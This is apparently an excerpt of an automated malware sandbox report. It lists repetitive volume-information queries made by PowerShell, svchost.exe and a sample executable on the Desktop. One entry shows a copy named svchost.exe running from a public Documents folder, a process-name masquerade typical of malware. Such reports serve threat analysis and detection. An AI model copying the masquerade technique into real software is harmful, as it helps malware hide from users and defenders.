            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeQueries volume information: C:\Users\user\Desktop\s9SWgUgyO5.exe VolumeInformation
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Users\Public\Documents\???????????????\svchost.exe VolumeInformation
            Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
